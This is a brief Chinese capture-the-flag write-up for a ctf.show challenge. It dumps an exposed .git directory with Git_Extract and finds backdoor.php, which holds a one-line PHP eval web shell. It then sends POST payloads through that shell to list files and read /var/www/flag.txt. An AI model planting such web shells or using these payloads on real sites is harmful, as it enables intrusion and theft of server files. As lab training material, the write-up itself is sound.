Git_Extract进行扫描
python git_extract.py http://ab303c77-a623-4ab8-ad76-2992c7d35c50.challenge.ctf.show/.git/
然后 [huc-serverlow@parrot]─[~/Git_Extract-master]
└──╼ $cd ab303c77-a623-4ab8-ad76-2992c7d35c50.challenge.ctf.show
─[huc-serverlow@parrot]─[~/Git_Extract-master/ab303c77-a623-4ab8-ad76-2992c7d35c50.challenge.ctf.show]
└──╼ $cat backdoor.php
<!-- 36D姑娘留的后门,闲人免进 -->
<?php
@eval($_POST['Letmein']);
执行phpinfo();函数
查看当前文件夹
Letmein=print_r(glob('*'));
得到flag
Letmein=highlight_file('/var/www/flag.txt');